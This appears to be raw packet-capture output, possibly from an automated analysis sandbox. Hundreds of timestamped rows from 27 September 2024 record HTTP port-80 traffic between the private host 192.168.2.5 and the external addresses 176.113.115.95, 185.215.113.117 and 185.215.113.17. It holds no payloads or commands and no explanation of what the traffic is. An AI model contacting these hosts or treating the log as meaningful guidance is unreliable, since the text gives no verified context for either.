Sep 27, 2024 04:21:16.677020073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677036047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677047968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677050114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.677059889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677067995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.677074909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677103996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.677138090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.677167892 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677181959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677192926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677205086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677216053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.677244902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.703892946 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.703912020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.703922987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.703958988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704005957 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704019070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704030037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704040051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704051018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704062939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704063892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704086065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704113007 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704158068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704169989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704181910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704216003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704324007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704327106 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704338074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704349995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.704385042 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.704399109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.708489895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708507061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708519936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708559990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.708592892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.708626986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708637953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708650112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708662033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.708662987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.708683968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.708705902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709522963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709536076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709546089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709578991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709579945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709604025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709605932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709618092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709629059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709640026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709641933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709651947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.709660053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.709686041 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714298010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714313984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714348078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714364052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714423895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714436054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714449883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714459896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714474916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714489937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714580059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714591026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714600086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.714618921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.714642048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.715485096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715495110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715504885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715517044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715524912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.715528965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715540886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715543985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.715573072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.715605021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715616941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.715646982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.715661049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.716061115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716097116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.716229916 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716240883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716247082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716257095 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716265917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716278076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716289043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.716584921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717313051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717324018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717334032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717344999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717350006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717355967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717363119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717369080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717380047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717401981 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717417002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717447042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717458010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717464924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717469931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717475891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717497110 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717519045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717655897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717667103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717674017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717678070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717683077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717693090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717699051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717699051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717717886 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717742920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717789888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717808008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717818022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717828989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.717829943 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717853069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.717873096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718491077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718502045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718513012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718523979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718544960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.718544960 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.718583107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.718619108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718631029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718641996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.718652010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718660116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.718662977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718674898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718684912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718688011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.718713999 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718755960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718767881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718777895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718790054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718791008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718800068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718801022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718813896 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718826056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718838930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718894958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718904018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718914032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718919992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.718928099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.718959093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.719059944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.719070911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.719093084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.719121933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.735955000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.735970020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.735981941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.735996008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.736006975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.736012936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.736020088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.736023903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.736037970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.736066103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.736066103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.736124039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.744199991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744216919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744231939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744241953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744249105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744250059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744261980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744272947 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744273901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744286060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744291067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744302034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744313955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744322062 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744337082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744363070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744424105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744435072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744446039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744451046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744461060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744469881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744472027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744478941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744482040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744488955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744502068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744528055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744744062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744756937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744769096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744779110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744782925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744791031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744796991 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744812012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744812965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744826078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744836092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744848013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.744848967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744865894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744875908 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.744885921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.759227037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759243011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759255886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759265900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759282112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759310007 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759356022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759367943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759377956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759401083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759411097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759438992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759479046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759519100 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759655952 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759670019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759680033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759685040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.759697914 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.759727955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760327101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760341883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760369062 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760385036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760793924 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760806084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760818005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760828972 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760833025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760839939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760847092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760854006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760864019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760869026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760916948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760934114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760945082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760957003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.760979891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.760991096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761099100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761111975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761121035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761127949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761137009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761137962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761167049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761193037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761286020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761297941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761312962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761323929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761328936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761346102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761363983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761416912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761428118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761457920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761468887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761591911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761603117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761620998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761630058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761631966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761643887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761643887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761656046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761658907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761673927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761689901 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761761904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761773109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761785030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761794090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761799097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761822939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761843920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761939049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761950970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761960983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761966944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761976004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761976004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.761987925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.761997938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762000084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762029886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762044907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762196064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762204885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762212038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762217999 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762223005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762238979 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762265921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762289047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762329102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762341976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762370110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762382984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.762614012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762625933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.762638092 CEST	49722	80	192.168.2.5	185.215.113.17
